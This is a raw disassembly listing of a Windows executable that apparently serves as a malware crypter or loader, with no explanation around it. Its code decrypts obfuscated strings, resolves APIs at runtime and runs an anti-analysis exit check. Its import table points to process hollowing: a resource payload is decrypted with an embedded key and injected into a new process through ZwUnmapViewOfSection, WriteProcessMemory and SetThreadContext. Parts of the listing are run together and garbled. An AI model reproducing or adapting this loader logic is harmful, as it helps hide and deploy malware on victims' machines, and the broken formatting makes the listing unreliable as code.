call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060E0
mov [edx], eax
lea ecx, [ebp-5Ch]
mov edx, ds:dword_4077F8
mov eax, offset aNwpooiaq@ircv ; "WoIQ]@rV"
call sub_4042A4
mov eax, [ebp-5Ch]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_40610C
mov [edx], eax
lea ecx, [ebp-60h]
mov edx, ds:dword_4077F8
mov eax, offset dword_405224
call sub_4042A4
mov eax, [ebp-60h]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060DC
mov [edx], eax
lea ecx, [ebp-64h]
mov edx, ds:dword_4077F8
mov eax, offset dword_40523C
call sub_4042A4
mov eax, [ebp-64h]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060D0
mov [edx], eax
lea ecx, [ebp-68h]
mov edx, ds:dword_4077F8
mov eax, offset aKwivpuddNmaRQ ; "WVUDNArQ"
call sub_4042A4
mov eax, [ebp-68h]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_406108
mov [edx], eax
lea ecx, [ebp-6Ch]
mov edx, ds:dword_4077F8
mov eax, offset dword_405270
call sub_4042A4
mov eax, [ebp-6Ch]
call sub_4036DC
push eax
push ebx
mov eax, [esi]
call eax
mov edx, ds:off_4060C4
mov [edx], eax
lea ecx, [ebp-70h]
mov edx, ds:dword_4077F8
mov eax, offset dword_405284
call sub_4042A4
mov eax, [ebp-70h]
call sub_4036DC
push eax
mov eax, ds:dword_4077EC
push eax
mov eax, [esi]
call eax
mov edx, ds:off_4060E4
mov [edx], eax
lea ecx, [ebp-74h]
mov edx, ds:dword_4077F8
mov eax, offset dword_405298
call sub_4042A4
mov eax, [ebp-74h]
call sub_4036DC
mov edx, eax
mov eax, offset dword_4077FC
call sub_403638
lea ecx, [ebp-78h]
mov edx, ds:dword_4077F8
mov eax, offset dword_4052A4
call sub_4042A4
mov eax, [ebp-78h]
call sub_4036DC
mov edx, eax
mov eax, offset dword_407800
call sub_403638
lea ecx, [ebp-7Ch]
mov edx, ds:dword_4077F8
mov eax, offset dword_4052B0
call sub_4042A4
mov eax, [ebp-7Ch]
call sub_4036DC
mov edx, eax
mov eax, offset dword_407840
call sub_403638
lea ecx, [ebp-80h]
mov edx, ds:dword_4077F8
mov eax, offset dword_4052C4
call sub_4042A4
mov eax, [ebp-80h]
call sub_4036DC
mov edx, eax
mov eax, offset dword_407844
call sub_403638
lea ecx, [ebp-84h]
mov edx, ds:dword_4077F8
mov eax, offset dword_4052D4
call sub_4042A4
mov eax, [ebp-84h]
call sub_4036DC
mov edx, eax
mov eax, offset dword_407848
call sub_403638
lea ecx, [ebp-88h]
mov edx, ds:dword_4077F8
mov eax, offset dword_4052E4
call sub_4042A4
mov eax, [ebp-88h]
call sub_4036DC
mov edx, eax
mov eax, offset dword_40784C
call sub_403638
push ebx
mov eax, ds:off_4060C8
mov eax, [eax]
call eax
mov eax, ds:dword_4077EC
push eax
mov eax, ds:off_4060C8
mov eax, [eax]
call eax
mov eax, ds:dword_4077E8
push eax
mov eax, ds:off_4060C8
mov eax, [eax]
call eax
push 0D34DC0D9h
push 0
push 1
mov eax, ds:off_4060C4
mov eax, [eax]
call eax
test eax, eax
jz short loc_404C51
xor eax, eax
call sub_403500
; ---------------------------------------------------------------------------
mov ds:byte_4077F0, 1
loc_404C51: ; CODE XREF: CODE:00404C41�j
push offset dword_4077F4
mov eax, ds:dword_407840
call sub_4036DC
push eax
push 80000001h
mov eax, ds:off_4060E4
mov eax, [eax]
call eax
not eax
cmp eax, ds:dword_407808
jnz short loc_404C87
xor eax, eax
call sub_403500
; ---------------------------------------------------------------------------
mov ds:byte_4077F0, 1
loc_404C87: ; CODE XREF: CODE:00404C77�j
cmp ds:byte_4077F0, 1
jnz short loc_404CFE
cmp ds:byte_4077F0, 1
jnz short loc_404CFE
loc_404C99: ; CODE XREF: CODE:00404CFC�j
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
mov ebx, 5
loc_404CC0: ; CODE XREF: CODE:00404CD1�j
mov eax, offset dword_40780C
mov edx, ds:dword_40783C
call sub_40356C
dec ebx
jnz short loc_404CC0
xor eax, eax
call sub_403500
; ---------------------------------------------------------------------------
push 0
call sub_403D48 ; ExitProcess
mov edx, 0FFFFCFA9h
mov eax, 0FFFF2BECh
call sub_4044C0
mov ds:dword_407804, eax
cmp ds:byte_4077F0, 1
jz short loc_404C99
loc_404CFE: ; CODE XREF: CODE:00404C8E�j
; CODE:00404C97�j
xor eax, eax
mov ds:dword_4077DC, eax
xor esi, esi
mov ebx, 1
mov eax, ds:dword_4077FC
call sub_4036DC
mov edx, eax
mov eax, offset dword_4076D4
call sub_403D98
mov ds:dword_4076D0, eax
mov edx, offset byte_4076D8
mov eax, ds:dword_4076D0
mov ecx, ds:dword_4076D4
call sub_4028E0
mov eax, ds:dword_407800
call sub_4036DC
mov edx, eax
mov eax, offset dword_4077DC
call sub_403D98
mov ds:dword_4077E4, eax
mov eax, offset dword_4076CC
mov edx, ds:dword_4077DC
call sub_403734
mov eax, offset dword_4076CC
call sub_40372C
lea eax, [eax+ebx-1]
push eax
mov eax, ds:dword_4076CC
call sub_403680
mov ecx, eax
mov eax, ds:dword_4077E4
pop edx
call sub_4028E0
cmp ds:dword_407804, 5
jle loc_404E1A
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
mov eax, offset dword_4077E0
mov edx, offset aLod85fafJRi ; "<lOD85FAf)#j]{ri"
mov ecx, 100h
call sub_403668
lea edx, [ebp-8Ch]
mov eax, ds:dword_4077E0
call sub_4044E0
mov edx, [ebp-8Ch]
mov eax, offset dword_4077E0
call sub_40356C
lea ecx, [ebp-90h]
mov edx, ds:dword_4077E0
mov eax, ds:dword_4076CC
call sub_4042A4
mov edx, [ebp-90h]
mov eax, offset dword_4076CC
call sub_40356C
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
loc_404E1A: ; CODE XREF: CODE:00404D94�j
mov eax, ds:dword_4076CC
call sub_403680
call sub_4027CC
mov ds:dword_4077E4, eax
mov eax, offset dword_4076CC
call sub_40372C
lea eax, [eax+ebx-1]
push eax
mov eax, ds:dword_4076CC
call sub_403680
mov ecx, eax
mov edx, ds:dword_4077E4
pop eax
call sub_4028E0
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
lea edx, [ebp-94h]
mov eax, esi
call sub_402A84
mov edx, [ebp-94h]
mov eax, ds:dword_4077E4
call sub_403E54
test al, al
jz short loc_404E8F
mov eax, ds:dword_4077E4
call sub_4027FC
loc_404E8F: ; CODE XREF: CODE:00404E83�j
xor eax, eax
pop edx
pop ecx
pop ecx
mov fs:[eax], edx
push offset loc_404EC4
loc_404E9C: ; CODE XREF: CODE:00404EC2�j
lea eax, [ebp-94h]
mov edx, 1Fh
call sub_40353C
lea eax, [ebp-18h]
call sub_4037C8
lea eax, [ebp-14h]
call sub_403518
retn
; ---------------------------------------------------------------------------
loc_404EBD: ; DATA XREF: CODE:00404619�o
jmp loc_402F8C
; ---------------------------------------------------------------------------
jmp short loc_404E9C
; ---------------------------------------------------------------------------
loc_404EC4: ; CODE XREF: CODE:00404EBC�j
; DATA XREF: CODE:00404E97�o
pop esi
pop ebx
call sub_403420
; ---------------------------------------------------------------------------
align 4
dd 0FFFFFFFFh, 0Bh
aLopakote124 db 'lopakote124',0 ; DATA XREF: CODE:0040466C�o
dd 0FFFFFFFFh, 0Ah
aVibapida36 db 'vibapida36',0 ; DATA XREF: CODE:0040467B�o
align 4
dd 0FFFFFFFFh, 0Ah
aYorawapa87 db 'yorawapa87',0 ; DATA XREF: CODE:0040468A�o
align 4
dd 0FFFFFFFFh, 0Ah
aTivoriso84 db 'tivoriso84',0 ; DATA XREF: CODE:00404699�o
align 4
dd 0FFFFFFFFh, 0Ah
aNoyetavo43 db 'noyetavo43',0 ; DATA XREF: CODE:004046A8�o
align 10h
dd 0FFFFFFFFh, 0Bh
aMoboyaja108 db 'moboyaja108',0 ; DATA XREF: CODE:004046B7�o
dd 0FFFFFFFFh, 0Ah
aFofigaba70 db 'fofigaba70',0 ; DATA XREF: CODE:004046C6�o
align 4
dd 0FFFFFFFFh, 0Ah
aPecipowe36 db 'pecipowe36',0 ; DATA XREF: CODE:004046D5�o
align 4
dd 0FFFFFFFFh, 0Bh
aSasapero105 db 'sasapero105',0 ; DATA XREF: CODE:004046E4�o
dd 0FFFFFFFFh, 0Ah
aWohepodo79 db 'wohepodo79',0 ; DATA XREF: CODE:004046F3�o
align 4
dd 0FFFFFFFFh, 0Ah
aHakifoxi63 db 'hakifoxi63',0 ; DATA XREF: CODE:00404702�o
align 4
dd 0FFFFFFFFh, 0Ah
aWonexifi78 db 'wonexifi78',0 ; DATA XREF: CODE:00404711�o
align 4
dd 0FFFFFFFFh, 0Ah
aBelogoki68 db 'belogoki68',0 ; DATA XREF: CODE:00404720�o
align 10h
dd 0FFFFFFFFh, 7Ah
a00000010000000 db '00000010000000000000000020000000000000000000000000000000000000000'
; DATA XREF: CODE:0040472F�o
db '000000000000000000000000000000000000000000000000000000000',0
align 4
dd 0FFFFFFFFh, 10h
aQnkomxlZe78 db '|[}QnkomxL%ZE]78',0 ; DATA XREF: CODE:00404759�o
align 10h
dd 0FFFFFFFFh, 0Eh
dword_405078 dd 6BAF5799h, 78A654B4h, 47A270B9h, 6AA2h, 0FFFFFFFFh
; DATA XREF: CODE:0040476C�o
dd 0Ch
dword_405090 dd 55A957B5h, 9F657A3h, 4EBA73F1h, 0 ; CODE:004047BD�o
dd 0FFFFFFFFh, 9
dword_4050A8 dd 57BF46B0h, 54A115AAh, 0B0h, 0FFFFFFFFh, 0Chdword_4050BC dd 5AAD56BFh, 9F652B6h, 4EBA73F1h, 0 dd 0FFFFFFFFh, 14h
aDeoulzFIaDk@Md db 'EUZf{aD@MA',0 ; DATA XREF: CODE:0040482C�o
align 4
dd 0FFFFFFFFh, 0Dh
dword_4050F4 dd 5FB55B98h, 55B65E94h, 47B264ADh, 91h, 0FFFFFFFFh, 0Ch
; DATA XREF: CODE:0040485A�o
dword_40510C dd 5FBA5D92h, 54B65E94h, 47B565AAh, 0 dd 0FFFFFFFFh, 0Ch
dword_405124 dd 50B85D92h, 54B65E94h, 47B565AAh, 0 dd 0FFFFFFFFh, 0Ch
dword_40513C dd 5EBE4098h, 54B65E94h, 47B565AAh, 0 dd 0FFFFFFFFh, 0Eh
dword_405154 dd 5EA15B8Dh, 5C975DA9h, 50A57BAEh, 7CB2h, 0FFFFFFFFh
; DATA XREF: CODE:004048FE�o
dd 0Bh
dword_40516C dd 5EBE4098h, 4AA7528Ah, 0AC66BDh, 0FFFFFFFFh, 0Eh
; DATA XREF: CODE:00404927�o
dword_405180 dd 4FA95B88h, 78A95AB3h, 41BF78B1h, 6194h, 0FFFFFFFFh
; DATA XREF: CODE:00404950�o
dd 10h
aIIoZiZqkkCkz db '[OZ`qKcZ',0 ; DATA XREF: CODE:00404979�o
align 4
dd 0FFFFFFFFh, 12h
aI@Ogk_NRrvlY db '@Ok_{]rLY',0 ; DATA XREF: CODE:004049A2�o
align 4
dd 0FFFFFFFFh, 11h
aMw_ciksMncZap db 'W_ISmczP',0 ; DATA XREF: CODE:004049CB�o
align 4
dd 0FFFFFFFFh, 10h
aSwpooiaq@ircv db 'WoIQ]@rV',0 ; DATA XREF: CODE:004049F4�o
align 10h
dd 0FFFFFFFFh, 10h
aNwpooiaq@ircv db 'WoIQ]@rV',0 ; DATA XREF: CODE:00404A1D�o
align 4
dd 0FFFFFFFFh, 0Eh
dword_405224 dd 5ABE409Dh, 4B955EB2h, 51B577B2h, 58A2h, 0FFFFFFFFh
; DATA XREF: CODE:00404A46�o
dd 0Ch
dword_40523C dd 4EA8578Ch, 53915EABh, 46B772ADh, 0 dd 0FFFFFFFFh, 10h
aKwivpuddNmaRQ db 'WVUDNArQ',0 ; DATA XREF: CODE:00404A98�o
align 4
dd 0FFFFFFFFh, 0Bh
dword_405270 dd 55BE4291h, 5BAA4996h, 0A667B9h, 0FFFFFFFFh, 0Bh
; DATA XREF: CODE:00404AC1�o
dword_405284 dd 74BC578Ch, 73AB5EB6h, 946DB9h, 0FFFFFFFFh, 1dword_405298 dd 8Ch, 0FFFFFFFFh, 1dword_4052A4 dd 99h, 0FFFFFFFFh, 8dword_4052B0 dd 4FBD5D8Dh, 5DB75AB1h, 0 dd 0FFFFFFFFh, 4
dword_4052C4 dd 51BE42B1h, 0 dd 0FFFFFFFFh, 7
dword_4052D4 dd 11AF57B0h, 0A745A4h, 0FFFFFFFFh, 12hdword_4052E4 dd 5AAF41FEh, 58B64FB4h, 4ABB6CB4h, 468C74BCh, 53BDh
; DATA XREF: CODE:00404BE4�o
dd 42h dup(?)
CODE ends
; Section 2. (virtual address 00006000)
; Virtual size : 00000110 ( 272.)
; Section size in file : 00000110 ( 272.)
; Offset to raw data for section: 00006000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
DATA segment para public 'DATA' use32
assume cs:DATA
;org 406000h
dword_406000 dd 0 ; sub_403364+2�w ...
dword_406004 dd 0 ; sub_403308+37�r ...
dword_406008 dd 33DC589Ch ; sub_402B6C+E�w
byte_40600C db 2 ; DATA XREF: sub_403AE4+D�w
db 8Dh, 40h, 0
word_406010 dw 1332h ; DATA XREF: sub_402C94+6�r
; sub_402C94:loc_402D0C�r ...
dw 0C08Bh
byte_406014 db 0 ; DATA XREF: sub_402D70�r sub_402D8C�r ...
db 8Dh, 40h, 0
byte_406018 db 0 ; DATA XREF: sub_4031E8-336�r
; sub_4031E8:loc_402EED�r
db 8Dh, 40h, 0
byte_40601C db 0 ; DATA XREF: sub_403394:loc_4033F5�r
db 8Dh, 40h, 0
dword_406020 dd 0 dword_406024 dd 0 off_406028 dd offset sub_402178 ; DATA XREF: sub_4027CC+A�r
; sub_40281C+3F�r
off_40602C dd offset sub_402324 ; DATA XREF: sub_4027FC+5�r
; sub_40281C+26�r
off_406030 dd offset sub_402700 ; DATA XREF: sub_40281C+D�r
byte_406034 db 0 ; DATA XREF: sub_402878+36�r
aRsu db '',0
aFxn@ db '@',0
aError db 'Error',0 ; DATA XREF: sub_403394+6C�o
dw 0C08Bh
aRuntimeErrorAt db 'Runtime error at 00000000',0 ; DATA XREF: sub_403308+3�o
; sub_403394+32�o ...
dw 0C08Bh
byte_406078 db 30h ; DATA XREF: sub_403308+41�r
db 31h, 32h, 33h
dd 37363534h, 42413938h, 46454443h
TlsIndex dd 0 ; DATA XREF: sub_403BF8+D�r
; sub_403BF8+40�r ...
dword_40608C dd 0 ; sub_403C94+33�o ...
dword_406090 dd 400000h dword_406094 dd 0 dword_406098 dd 0 dd 2 dup(0)
dword_4060A4 dd 1 dd 10h, 2, 20h, 4, 40h, 4, 40h
off_4060C4 dd offset dword_4076A8 ; DATA XREF: CODE:00404AD9�r
; CODE:00404C36�r
off_4060C8 dd offset dword_40767C ; DATA XREF: CODE:0040493F�r
; CODE:00404C06�r ...
off_4060CC dd offset dword_407664 ; DATA XREF: CODE:00404872�r
off_4060D0 dd offset dword_40769C ; DATA XREF: sub_403E54+2A5�r
; CODE:00404A87�r
off_4060D4 dd offset dword_407678 ; DATA XREF: sub_403E54+170�r
; sub_403E54+1D2�r ...
off_4060D8 dd offset dword_407688 ; DATA XREF: sub_403E2C+2�r
; CODE:00404849�r
off_4060DC dd offset dword_407698 ; DATA XREF: sub_403E54+88�r
; CODE:00404A5E�r
off_4060E0 dd offset dword_407690 ; DATA XREF: sub_403E54+C0�r
; CODE:00404A0C�r
off_4060E4 dd offset dword_4076AC ; DATA XREF: CODE:00404B07�r
; CODE:00404C66�r
off_4060E8 dd offset dword_407680 ; DATA XREF: sub_403E54+146�r
; CODE:00404968�r
off_4060EC dd offset dword_40766C ; DATA XREF: CODE:0040489B�r
off_4060F0 dd offset dword_407670 ; DATA XREF: CODE:004048C4�r
off_4060F4 dd offset dword_407668 ; DATA XREF: CODE:00404916�r
off_4060F8 dd offset dword_407684 ; DATA XREF: sub_403E54+207�r
; CODE:00404991�r
off_4060FC dd offset dword_40768C ; DATA XREF: sub_403E54+F8�r
; CODE:004049E3�r
off_406100 dd offset dword_407674 ; DATA XREF: CODE:004048ED�r
off_406104 dd offset dword_4076A4 ; DATA XREF: CODE:00404610�r
off_406108 dd offset dword_4076A0 ; DATA XREF: sub_403E54+296�r
; CODE:00404AB0�r
off_40610C dd offset dword_407694 ; DATA XREF: sub_403E54+269�r
; CODE:00404A35�r
align 100h
DATA ends
; Section 3. (virtual address 00007000)
; Virtual size : 00000851 ( 2129.)
; Section size in file : 00000851 ( 2129.)
; Offset to raw data for section: 00007000
; Flags C0000000: Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Regular
; Segment permissions: Read/Write
BSS segment para public '' use32
assume cs:BSS
;org 407000h
assume es:nothing, ss:nothing, ds:CODE, fs:nothing, gs:nothing
off_407000 dd offset sub_403924 ; DATA XREF: sub_403AE4+2F�w
dword_407004 dd 0 dword_407008 dd 0 ; sub_402878+16�r
dword_40700C dd 0 ; CODE:00403158�r
off_407010 dd offset sub_401008 ; DATA XREF: sub_402D70+14�r
; sub_402D8C+16�r ...
off_407014 dd offset sub_401010 ; DATA XREF: sub_4031E8-2B6�r
; CODE:00403140�r ...
dword_407018 dd 0 ; sub_403420+B7�r
dword_40701C dd 400000h dword_407020 dd 300h byte_407024 db 0 ; DATA XREF: sub_4032C8+33�w
align 4
dword_407028 dd 0Ah dword_40702C dd 142340h dword_407030 dd 0 byte_407034 db 0 ; DATA XREF: sub_403394+1�r
byte_407035 db 0 ; DATA XREF: sub_40191C+1C�r
; sub_40191C:loc_4019D0�r ...
byte_407036 db 2 ; DATA XREF: sub_403AE4+28�w
align 4
dword_407038 dd 0 ; sub_403A90+19�o
word_40703C dw 0D7B0h ; DATA XREF: sub_403AE4+4C�w
align 10h
dd 71h dup(0)
dword_407204 dd 0 ; sub_403A90+23�o
word_407208 dw 0D7B0h ; DATA XREF: sub_403394+A�r
; sub_403AE4+55�w
align 10h
dword_407210 dd 0 align 10h
dword_407220 dd 0 dd 6Bh dup(0)
dword_4073D0 dd 0 word_4073D4 dw 0D7B0h ; DATA XREF: sub_403AE4+5E�w
align 4
dd 71h dup(0)
dword_40759C dd 16h ; sub_402030+C3�w ...
dword_4075A0 dd 16420h ; sub_402030+CC�w ...
dword_4075A4 dd 0 ; sub_403AE4�w
dword_4075A8 dd 3 ; sub_403AE4+9C�w ...
byte_4075AC db 0 ; DATA XREF: sub_40191C+A0�w
; sub_40191C:loc_4019EB�r ...
align 10h
dword_4075B0 dd 0 ; sub_4015E0+99�w ...
dword_4075B4 dd 6 dup(0) ; sub_40191C+25�o ...
dword_4075CC dd 0 ; sub_401114+3C�w ...
dword_4075D0 dd 146654h ; sub_4011FC+22�r ...
off_4075D4 dd offset off_4075D4 ; DATA XREF: sub_40137C+3E�o
; sub_4013E0+51�o ...
dd offset off_4075D4
dd 2 dup(0)
off_4075E4 dd offset off_4075E4 ; DATA XREF: sub_40169C+D�o
; sub_401744+12�o ...
dd offset off_4075E4
dd 2 dup(0)
dword_4075F4 dd 8718F4h dword_4075F8 dd 8701E0h align 10h
dword_407600 dd 8701E0h ; sub_401AF4+4�r ...
dword_407604 dd 1DECh dword_407608 dd 8CE210h ; sub_401EC0+2E�r ...
dword_40760C dd 0 ; sub_40191C+5E�r ...
off_407610 dd offset off_407610 ; DATA XREF: sub_40191C+43�o
; sub_4019F4+90�o ...
dd offset off_407610
align 10h
dword_407620 dd 0 ; sub_403258+9�o ...
dword_407624 dd 12FFB4h ; sub_4031C0+2�r
off_407628 dd offset dword_40458C ; DATA XREF: sub_4032C8+14�w
dword_40762C dd 0 off_407630 dd offset dword_40608C ; DATA XREF: sub_4032C8+20�w
dd 6 dup(0)
byte_40764C db 0 ; DATA XREF: sub_403C48�r
align 10h
dword_407650 dd 400000h ; sub_403C94+16�r ...
dword_407654 dd 0 ; CODE:loc_403D08�w
dword_407658 dd 0 dword_40765C dd 0 ; sub_403D40�w
dword_407660 dd 0 ; sub_403D90�w
dword_407664 dd 7C80BE89h ; resolved to->KERNEL32.FindResourceA ; DATA:off_4060CC�o
dword_407668 dd 7C80BC69h ; resolved to->KERNEL32.SizeofResource ; DATA:off_4060F4�o
dword_40766C dd 7C809FB5h ; resolved to->KERNEL32.LoadResource ; DATA:off_4060EC�o
dword_407670 dd 7C80CC97h ; resolved to->KERNEL32.SetHandleCount ; DATA:off_4060F0�o
dword_407674 dd 7C8260C2h ; resolved to->KERNEL32.FreeResource ; DATA:off_406100�o
dword_407678 dd 7C80220Fh ; resolved to->KERNEL32.WriteProcessMemorydword_40767C dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_407680 dd 7C809A72h ; resolved to->KERNEL32.VirtualAllocExdword_407684 dd 7C801A5Dh ; resolved to->KERNEL32.VirtualProtectExdword_407688 dd 7C90E960h ; resolved to->NTDLL.ZwUnmapViewOfSectiondword_40768C dd 7C8021CCh ; resolved to->KERNEL32.ReadProcessMemorydword_407690 dd 7C83970Dh ; resolved to->KERNEL32.GetThreadContextdword_407694 dd 7C862A69h ; resolved to->KERNEL32.SetThreadContextdword_407698 dd 7C802367h ; resolved to->KERNEL32.CreateProcessAdword_40769C dd 7C8328F7h ; resolved to->KERNEL32.ResumeThreaddword_4076A0 dd 7C801E16h ; resolved to->KERNEL32.TerminateProcessdword_4076A4 dd 7C80ADA0h ; resolved to->KERNEL32.GetProcAddressdword_4076A8 dd 7C8309E1h ; resolved to->KERNEL32.OpenProcessdword_4076AC dd 77DFC41Bh ; resolved to->ADVAPI32.RegOpenKeyAdword_4076B0 dd 0 ; sub_403E1C�w
dword_4076B4 dd 0 ; sub_404164�w
dword_4076B8 dd 0 ; sub_40419C�w
dword_4076BC dd 0 ; sub_4041D4�w
dword_4076C0 dd 0 ; sub_40420C�w
dword_4076C4 dd 0 ; sub_404244�w
dword_4076C8 dd 0 ; sub_40429C�w
dword_4076CC dd 8B800Ch ; CODE:00404D67�o ...
dword_4076D0 dd 4228A0h ; CODE:00404D2C�r
dword_4076D4 dd 103h ; CODE:00404D31�r
byte_4076D8 db 3 dup(1) ; DATA XREF: CODE:00404D27�o
aLod85fafJRi db '<lOD85FAf)#j]{ri',0 ; DATA XREF: CODE:00404DB3�o
dd 3Ch dup(0)
dword_4077DC dd 16200h ; CODE:00404D48�o ...
dword_4077E0 dd 887B10h ; CODE:00404DC8�r ...
dword_4077E4 dd 89DD38h ; CODE:00404D82�r ...
dword_4077E8 dd 7C900000h ; CODE:0040483F�r ...
dword_4077EC dd 77DD0000h ; CODE:00404AFD�r ...
byte_4077F0 db 0 ; DATA XREF: CODE:00404C4A�w
; CODE:00404C80�w ...
align 4
dword_4077F4 dd 40h dword_4077F8 dd 8701CCh ; CODE:00404766�r ...
dword_4077FC dd 871604h ; CODE:00404D0C�r
dword_407800 dd 871624h ; CODE:00404D3C�r
dword_407804 dd 0CC61Fh ; CODE:0040464C�r ...
dword_407808 dd 0 ; CODE:00404C71�r
dword_40780C dd 870144h ; CODE:0040472A�o ...
dword_407810 dd 870024h dword_407814 dd 87003Ch dword_407818 dd 870054h dword_40781C dd 87006Ch dword_407820 dd 870084h dword_407824 dd 87009Ch dword_407828 dd 8700B4h dword_40782C dd 8700CCh dword_407830 dd 8700E4h dword_407834 dd 8700FCh dword_407838 dd 870114h dword_40783C dd 87012Ch ; CODE:00404CC5�r
dword_407840 dd 8716D0h ; CODE:00404C56�r
dword_407844 dd 87173Ch dword_407848 dd 8717A4h dword_40784C dd 8718E0h align 200h
BSS ends
; Section 4. (virtual address 00008000)
; Virtual size : 000004A6 ( 1190.)
; Section size in file : 000004A6 ( 1190.)
; Offset to raw data for section: 00008000
; Flags C0000040: Data Readable Writable
; Alignment : default
; ===========================================================================
; Segment type: Pure data
; Segment permissions: Read/Write
_idata segment para public 'DATA' use32
assume cs:_idata
;org 408000h
dd 3 dup(0)
dd 8164h, 80A0h, 3 dup(0)
dd 8318h, 8100h, 3 dup(0)
dd 8350h, 8110h, 3 dup(0)
dd 8390h, 8120h, 3 dup(0)
dd 83C2h, 812Ch, 3 dup(0)
dd 840Eh, 8140h, 3 dup(0)
dd 844Ch, 8150h, 5 dup(0)
dword_4080A0 dd 7C91188Ah ; resolved to->NTDLL.RtlDeleteCriticalSectiondword_4080A4 dd 7C9010EDh ; resolved to->NTDLL.RtlLeaveCriticalSectiondword_4080A8 dd 7C901005h ; resolved to->NTDLL.RtlEnterCriticalSectiondword_4080AC dd 7C809EF1h ; resolved to->KERNEL32.InitializeCriticalSectiondword_4080B0 dd 7C809AE4h ; resolved to->KERNEL32.VirtualFreedword_4080B4 dd 7C809A51h ; resolved to->KERNEL32.VirtualAllocdword_4080B8 dd 7C80992Fh ; resolved to->KERNEL32.LocalFreedword_4080BC dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_4080C0 dd 7C8111DAh ; resolved to->KERNEL32.GetVersiondword_4080C4 dd 7C809728h ; resolved to->KERNEL32.GetCurrentThreadIddword_4080C8 dd 7C809BF8h ; resolved to->KERNEL32.MultiByteToWideChardword_4080CC dd 7C80A415h ; resolved to->KERNEL32.GetThreadLocaledword_4080D0 dd 7C801EEEh ; resolved to->KERNEL32.GetStartupInfoAdword_4080D4 dd 7C80B4CFh ; resolved to->KERNEL32.GetModuleFileNameAdword_4080D8 dd 7C80D262h ; resolved to->KERNEL32.GetLocaleInfoAdword_4080DC dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_4080E0 dd 7C80ABDEh ; resolved to->KERNEL32.FreeLibrarydword_4080E4 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcessdword_4080E8 dd 7C810D87h ; resolved to->KERNEL32.WriteFiledword_4080EC dd 7C862E2Ah ; resolved to->KERNEL32.UnhandledExceptionFilterdword_4080F0 dd 7C937A40h ; resolved to->NTDLL.RtlUnwinddword_4080F4 dd 7C812A09h ; resolved to->KERNEL32.RaiseExceptiondword_4080F8 dd 7C812F39h ; resolved to->KERNEL32.GetStdHandle align 10h
dword_408100 dd 7E43119Bh ; resolved to->USER32.GetKeyboardTypedword_408104 dd 7E45058Ah ; resolved to->USER32.MessageBoxAdword_408108 dd 7E42DF50h ; resolved to->USER32.CharNextA align 10h
dword_408110 dd 77DD7883h ; resolved to->ADVAPI32.RegQueryValueExAdword_408114 dd 77DD761Bh ; resolved to->ADVAPI32.RegOpenKeyExAdword_408118 dd 77DD6BF0h ; resolved to->ADVAPI32.RegCloseKey align 10h
dword_408120 dd 77124880h dword_408124 dd 77124BA7h dd 0
dword_40812C dd 7C809BC5h ; resolved to->KERNEL32.TlsSetValuedword_408130 dd 7C809740h ; resolved to->KERNEL32.TlsGetValuedword_408134 dd 7C80998Dh ; resolved to->KERNEL32.LocalAllocdword_408138 dd 7C80B6A1h ; resolved to->KERNEL32.GetModuleHandleA align 10h
dword_408140 dd 7C801D77h ; resolved to->KERNEL32.LoadLibraryAdword_408144 dd 7C812F1Dh ; resolved to->KERNEL32.GetCommandLineAdword_408148 dd 7C81CDDAh ; resolved to->KERNEL32.ExitProcess align 10h
dword_408150 dd 7C9012D6h ; resolved to->NTDLL.RtlInitUnicodeStringdword_408154 dd 7C90125Ch ; resolved to->NTDLL.RtlInitStringdword_408158 dd 7C9161CAh ; resolved to->NTDLL.LdrLoadDlldword_40815C dd 7C919B88h ; resolved to->NTDLL.LdrGetProcedureAddress dd 0
aKernel32_dll db 'kernel32.dll',0
align 4
aDeletecritical db 'DeleteCriticalSection',0
align 4
aLeavecriticals db 'LeaveCriticalSection',0
align 4
aEntercriticals db 'EnterCriticalSection',0
align 4
aInitializecrit db 'InitializeCriticalSection',0
align 4
aVirtualfree db 'VirtualFree',0
dd 69560000h, 61757472h, 6C6C416Ch, 636Fh, 6F4C0000h, 466C6163h
dd 656572h, 6F4C0000h, 416C6163h, 636F6C6Ch, 0
aGetversion db 'GetVersion',0
align 4
dd 65470000h, 72754374h, 746E6572h, 65726854h, 64496461h
dd 0
aMultibytetowid db 'MultiByteToWideChar',0
dd 65470000h, 72685474h, 4C646165h, 6C61636Fh, 65h, 53746547h
dd 74726174h, 6E497075h, 416F66h, 65470000h, 646F4D74h
dd 46656C75h, 4E656C69h, 41656D61h, 0
aGetlocaleinfoa db 'GetLocaleInfoA',0
align 4
dd 65470000h, 6D6F4374h, 646E616Dh, 656E694Ch, 41h, 65657246h
dd 7262694Ch, 797261h, 78450000h, 72507469h, 7365636Fh
dd 73h, 74697257h, 6C694665h, 65h, 61686E55h, 656C646Eh
dd 63784564h, 69747065h, 69466E6Fh, 7265746Ch, 0
aRtlunwind db 'RtlUnwind',0
align 4
aRaiseexception db 'RaiseException',0
align 4
dd 65470000h, 64745374h, 646E6148h, 656Ch, 72657375h, 642E3233h
dd 6C6Ch, 65470000h, 79654B74h, 72616F62h, 70795464h, 65h
dd 7373654Dh, 42656761h, 41786Fh, 68430000h, 654E7261h
dd 417478h, 61766461h, 32336970h, 6C6C642Eh, 0
aRegqueryvaluee db 'RegQueryValueExA',0
align 4
aRegopenkeyexa db 'RegOpenKeyExA',0
align 4
aRegclosekey db 'RegCloseKey',0
aOleaut32_dll db 'oleaut32.dll',0
align 10h
